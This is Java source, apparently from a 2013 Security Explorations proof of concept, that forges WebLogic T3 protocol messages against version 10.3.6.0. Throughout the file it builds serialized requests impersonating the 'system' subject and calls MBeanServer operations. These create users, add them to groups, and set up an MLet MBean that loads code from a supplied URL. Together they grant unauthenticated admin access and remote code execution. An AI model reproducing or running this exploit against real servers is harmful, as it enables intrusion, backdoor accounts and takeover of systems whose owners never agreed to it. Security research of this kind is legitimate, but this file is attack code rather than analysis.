/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.rmi.*;
import java.util.*;
import javax.management.*;

public class T3Proto {
 public static final String WLS_VERSION = "10.3.6.0";

 public static final int OHS_BUFSIZE = 0x2000;

// public static final int ABBREVS_SIZE  = 255;
 public static final int ABBREVS_SIZE  = 2048;
 public static final int HEADER_LENGTH = 19;

 public static final byte CMD_NO_ROUTE_IDENTIFY_REQUEST = 9;
 public static final byte CMD_REQUEST                   = 5;

 public static final int CONTEXT_JVMID_FLAG         = 1;
 public static final int CONTEXT_EXTENDED_FLAG      = 8;
 public static final int CONTEXT_EXTENDED_USER_FLAG = 16;

 public static final String mapped_classes[]={
  "ClassTableEntry", "weblogic.rjvm.ClassTableEntry",
  "PeerInfo", "weblogic.common.internal.PeerInfo",
  "VersionInfo", "weblogic.common.internal.VersionInfo",
  "PackageInfo", "weblogic.common.internal.PackageInfo",
  "JVMID", "weblogic.rjvm.JVMID",
  "ImmutableServiceContext", "weblogic.rjvm.ImmutableServiceContext",
  "BasicServiceContext", "weblogic.rmi.provider.BasicServiceContext",
  "WorkServiceContext", "weblogic.rmi.provider.WorkServiceContext",
  "MethodDescriptor","weblogic.rmi.internal.MethodDescriptor",
  "AuthenticatedUser","weblogic.security.acl.internal.AuthenticatedUser",
  "AuthenticatedSubject","weblogic.security.acl.internal.AuthenticatedSubject",
  "AuthenticatedSubject$SealableSet","weblogic.security.acl.internal.AuthenticatedSubject$SealableSet"
 };

 static Hashtable map;

 public static class Chunk extends ObjectOutputStream {
  ByteArrayOutputStream out;
  Stack abbrevs;
  int abbrevid;

  public Chunk() throws IOException {
   this(new ByteArrayOutputStream());
  }

  public Chunk(ByteArrayOutputStream os) throws IOException {
   super(os);
   out=os;
  }  

  public Chunk(Stack abbrevs) throws IOException {
   this(new ByteArrayOutputStream());
   this.abbrevs=abbrevs;
  }  

  public void writeStreamHeader() throws IOException {
  }

  public void writeClassDescriptor(ObjectStreamClass desc)
 throws IOException
 {
   if (abbrevs!=null) {
    abbrevs.push(new ClassTableEntry(desc));
    writeByte(abbrevid++);
   } else super.writeClassDescriptor(desc);   
  }

  public void writeUTF(String s) throws IOException {

   String name=mapped_name(s);

   if (name!=null) s=name;

   super.writeUTF(s);
  }

  public byte[] bytes() {
   return out.toByteArray();
  }

  public void incabbrevid() {
   abbrevid++;
  }

  public void write_byte(int b) {
   out.write(b&0xff);
  }

  public void write_short(int s) {
   write_byte(s>>8);
   write_byte(s);
  }

  public void write_int(int i) {
   write_byte(i>>24);
   write_byte(i>>16);
   write_byte(i>>8);
   write_byte(i);
  }

  public void write_long(long l) {
   write_int((int)(l>>32));
   write_int((int)l);
  }

  public void write_string(String s) throws Throwable {
   write_short(s.length());
   out.write(s.getBytes());
  }

  public void write_bytes(byte tab[]) throws Throwable {
   out.write(tab);
  }
 }

 public static class JVMMessage {
  int cmd;
  int flags;
  int qos;
  int responseId;
  int invokableId;
  int abbrevOffset;
  Stack abbrevs;
  Chunk abbdata;
  Chunk msgdata;

  public JVMMessage(int cmd,int flags,int qos,int responseId,int invokableId) throws IOException {
   this.cmd=cmd;
   this.flags=flags;
   this.qos=qos;
   this.responseId=responseId;
   this.invokableId=invokableId;
   abbrevs=new Stack();
   msgdata=new Chunk(abbrevs);
   abbdata=new Chunk();
  }

  public Chunk abbdata() {
   return abbdata;
  }

  public Chunk msgdata() {
   return msgdata;
  }

  public byte[] header() throws IOException {
   Chunk hdr=new Chunk();
   hdr.write_byte(cmd);
   hdr.write_byte(qos);
   hdr.write_byte(flags);
   hdr.write_int(responseId);
   hdr.write_int(invokableId);
   hdr.write_int(abbrevOffset);

   return hdr.bytes();
  }

  public void write_byte(int b) {
   msgdata.write_byte(b);
  }

  public void write_short(int s) {
   msgdata.write_short(s);
  }

  public void write_int(int i) {
   msgdata.write_int(i);
  }

  public void write_long(long l) {
   msgdata.write_long(l);
  }

  public void write_string(String s) throws Throwable {
   msgdata.write_string(s);
  }

  public void write_bytes(byte tab[]) throws Throwable {
   msgdata.write_bytes(tab);
  }

  public void write_object(Object o) throws Throwable {
   msgdata.writeObject(o);
  }

  public void push(Object o) {
   push(o,false);
  }

  public void push(Object o,boolean update) {
   abbrevs.push(o);
   if (update) {
    msgdata.incabbrevid();
   }
  }

  public int prepare_abbrevs() throws Throwable {
   abbrevOffset=msgdata.bytes().length+HEADER_LENGTH;
   int cnt=abbrevs.size();

   for(int i=0;i<cnt;i++) {
    Object abbrev=abbrevs.pop();

    if (abbrev==null) {
     abbdata.write_byte(0xfe);
     abbdata.write_short(ABBREVS_SIZE);
    } else {
     abbdata.write_byte(0xfe);
     abbdata.write_short(ABBREVS_SIZE+1);

     abbdata.write_byte(0x00);
     abbdata.write_short(ObjectStreamConstants.STREAM_MAGIC);
     abbdata.write_short(ObjectStreamConstants.STREAM_VERSION);

     Chunk body=new Chunk();
     body.writeObject(abbrev);

     abbdata.write_bytes(body.bytes());
    }
   }

   return cnt;
  }

  public byte[] prepare() throws Throwable {
   int abbcnt=prepare_abbrevs();

   Chunk data=new Chunk();   

   byte header[]=header();
   byte msgpart[]=msgdata().bytes();
   byte abbpart[]=abbdata().bytes();

   int total=header.length+msgpart.length+1+abbpart.length+4;

   data.write_int(total);
   data.write_bytes(header);
   data.write_bytes(msgpart);
   data.write_byte(abbcnt);
   data.write_bytes(abbpart);

   return data.bytes();
  }
 }

 static {
  init_classmap();
 }

 static void map_name(String a1,String b1) {
  try {
   String a2=a1.replace('.','/');
   String b2=b1.replace('.','/');

   String a3="L"+a1+";";
   String b3="L"+b1+";";

   String a4="["+a3;
   String b4="["+b3;

   map.put(a1,b1);
   map.put(a3,b3);
   map.put(a4,b4);
  } catch(Throwable t) {}
 }

 static void init_classmap() {
  try {
   map=new Hashtable();

   for(int i=0;i<mapped_classes.length;i+=2) {
    map_name(mapped_classes[i],mapped_classes[i+1]);
   }
  } catch(Throwable t) {}
 }

 public static String mapped_name(String s) {
  return (String)map.get(s);
 }

 public static byte[] get_bootstrap_msg(boolean secure,String path,int size) {
  String msg="";

  if (secure) {
   msg+="t3s ";
  } else {
   msg+="t3 ";
  }

  if (size>0) {
   if (path==null) path="/weblogic";
   msg+=path+" HTTP/1.1 ";
  }

  msg+=WLS_VERSION+"\n";
  msg+="Dummy:dummy\n";
  msg+="AS:"+ABBREVS_SIZE+"\n";
  msg+="HL:"+HEADER_LENGTH+"\n";

  if (size>0) {
   msg+="Host: dummy\n";
   msg+="Content-Length: "+size+"\n";
  }

  msg+="\n";

  return msg.getBytes();
 }

 public static byte[] read_bootstrap_resp(InputStream in) {
  String msg="";

  try {
   DataInputStream dis=new DataInputStream(in);
   String line=dis.readLine();

   while(true) {
    if ((line==null)||(line.length()==0)) break;
    msg+=line+"\n";

    line=dis.readLine();
   }

  } catch(Throwable t) {}

  return msg.getBytes();
 }

 public static byte[] read_resp(InputStream in) {
  byte msg[]=null;
 
  try {
   int b1=in.read()&0xff;
   int b2=in.read()&0xff;
   int b3=in.read()&0xff;
   int b4=in.read()&0xff;

   int len=((b1<<24)|(b2<<16)|(b3<<8)|(b4))-4;

   if (len>0) {
    msg=new byte[len];
    DataInputStream dis=new DataInputStream(in);
    dis.readFully(msg);
   }
  } catch(Throwable t) {}

  return msg;
 }

 public static byte[] get_identify_request() {
  byte res[]=null;

  try {
   JVMMessage msg=new JVMMessage(CMD_NO_ROUTE_IDENTIFY_REQUEST,CONTEXT_JVMID_FLAG,0x65,-1,-1);

   msg.write_int(60000);//remotePeriodLength

   byte pubkey[]=new byte[24];
   msg.write_int(pubkey.length);
   msg.write_bytes(pubkey);

   msg.write_byte(0x02);
   msg.write_byte(ObjectStreamConstants.TC_RESET);

   //src
   msg.push(new JVMID(0x1122334455667788L,0x00000000));
   //dst
   msg.push(new JVMID(0x0000000000000000L,0x00000000));

   //subject
   msg.push(null);

   PeerInfo pi=new PeerInfo(10,3,0,5,false);
   msg.write_object(pi);

   res=msg.prepare();
  } catch(Throwable t) {}

  return res;
 }

 public static byte[] get_RMIConnection_invoke_request(int oid,String objname,String method,Object args[],String sigs[]) {
  byte res[]=null;

  try {
   JVMMessage msg=new JVMMessage(CMD_REQUEST,CONTEXT_EXTENDED_USER_FLAG|CONTEXT_EXTENDED_FLAG,0x65,1,oid);

   //subject
   msg.push(new AuthenticatedSubject("system"));

   //CustomCallData
   msg.write_byte(0x01);//number
   msg.write_byte(0x01);//abbreved
   msg.write_byte(0x00);//abbrev id

   String signature="invoke(Ljavax.management.ObjectName;Ljava.lang.String;Ljava.rmi.MarshalledObject;[Ljava.lang.String;Ljavax.security.auth.Subject;)";
   MethodDescriptor md=new MethodDescriptor(signature,oid);

   int id=6;//BasicOutboundRequest

   ImmutableServiceContext isctx=new ImmutableServiceContext(id,md);
   msg.push(isctx,true);

   //UserCustomCallData
   msg.write_byte(0x01);//number
   msg.write_byte(0x00);//abbreved

   WorkServiceContext wsctx=new WorkServiceContext();
   msg.write_object(wsctx);

   //invoke arguments
   //arg1
   ObjectName mbean=new ObjectName(objname);
   msg.write_object(mbean);
   
   //arg2
   msg.write_object(method);

   //arg3
   MarshalledObject mo=new MarshalledObject(args);
   msg.write_object(mo);

   //arg4
   msg.write_object(sigs);

   //arg5
   msg.write_object(null);

   res=msg.prepare();
  } catch(Throwable t) {}

  return res;
 }

 public static byte[] get_MBeanServer_invoke_request(int oid,String objname,String method,Object args[],String sigs[]) {
  byte res[]=null;

  try {
   JVMMessage msg=new JVMMessage(CMD_REQUEST,CONTEXT_EXTENDED_USER_FLAG|CONTEXT_EXTENDED_FLAG,0x65,1,oid);

   //subject
   msg.push(new AuthenticatedSubject("system"));

   //CustomCallData
   msg.write_byte(0x01);//number
   msg.write_byte(0x01);//abbreved
   msg.write_byte(0x00);//abbrev id

   String signature="invoke(Ljavax.management.ObjectName;Ljava.lang.String;[Ljava.lang.Object;[Ljava.lang.String;)";
   MethodDescriptor md=new MethodDescriptor(signature,oid);

   int id=6;//BasicOutboundRequest

   ImmutableServiceContext isctx=new ImmutableServiceContext(id,md);
   msg.push(isctx,true);

   //UserCustomCallData
   msg.write_byte(0x01);//number
   msg.write_byte(0x00);//abbreved

   WorkServiceContext wsctx=new WorkServiceContext();
   msg.write_object(wsctx);

   //invoke arguments
   //arg1
   ObjectName mbean=new ObjectName(objname);
   msg.write_object(mbean);
   
   //arg2
   msg.write_object(method);

   //arg3
   msg.write_object(args);

   //arg4
   msg.write_object(sigs);

   res=msg.prepare();
  } catch(Throwable t) {}

  return res;
 }

 public static byte[] get_MBeanServer_createMBean_request(int oid,String name,String objname) {
  byte res[]=null;

  try {
   JVMMessage msg=new JVMMessage(CMD_REQUEST,CONTEXT_EXTENDED_USER_FLAG|CONTEXT_EXTENDED_FLAG,0x65,1,oid);

   //subject
   msg.push(new AuthenticatedSubject("system"));

   //CustomCallData
   msg.write_byte(0x01);//number
   msg.write_byte(0x01);//abbreved
   msg.write_byte(0x00);//abbrev id

   String signature="createMBean(Ljava.lang.String;Ljavax.management.ObjectName;)";
   MethodDescriptor md=new MethodDescriptor(signature,oid);

   int id=6;//BasicOutboundRequest

   ImmutableServiceContext isctx=new ImmutableServiceContext(id,md);
   msg.push(isctx,true);

   //UserCustomCallData
   msg.write_byte(0x01);//number
   msg.write_byte(0x00);//abbreved

   WorkServiceContext wsctx=new WorkServiceContext();
   msg.write_object(wsctx);

   //invoke arguments
   //arg1
   msg.write_object(name);
   
   //arg2
   ObjectName mbean=new ObjectName(objname);
   msg.write_object(mbean);

   res=msg.prepare();
  } catch(Throwable t) {}

  return res;
 }

 public static byte[] get_createUser_request(int oid,String user,String pass,String desc) {
  String objname="Security:Name=myrealmDefaultAuthenticator";
  String method="createUser";

  Object args[]=new Object[3];
  args[0]=user;
  args[1]=pass;
  args[2]=desc;

  String sigs[]=new String[3];
  sigs[0]="java.lang.String";
  sigs[1]="java.lang.String";
  sigs[2]="java.lang.String";

  return get_MBeanServer_invoke_request(oid,objname,method,args,sigs);
 }

 public static byte[] get_addMemberToGroup_request(int oid,String group,String user) {
  String objname="Security:Name=myrealmDefaultAuthenticator";
  String method="addMemberToGroup";

  Object args[]=new Object[2];
  args[0]=group;
  args[1]=user;

  String sigs[]=new String[2];
  sigs[0]="java.lang.String";
  sigs[1]="java.lang.String";

  return get_MBeanServer_invoke_request(oid,objname,method,args,sigs);
 }

 public static byte[] get_createMBean_request(int oid,String name,String objname) {
  return get_MBeanServer_createMBean_request(oid,name,objname);
 }

 public static byte[] get_createMBeanMLet_request(int oid,String objname) {
  return get_MBeanServer_createMBean_request(oid,"javax.management.loading.MLet",objname);
 }

 public static byte[] get_getMBeansFromURL_request(int oid,String objname,String url) {
  String method="getMBeansFromURL";

  Object args[]=new Object[1];
  args[0]=url;

  String sigs[]=new String[1];
  sigs[0]="java.lang.String";

  return get_MBeanServer_invoke_request(oid,objname,method,args,sigs);
 }

}
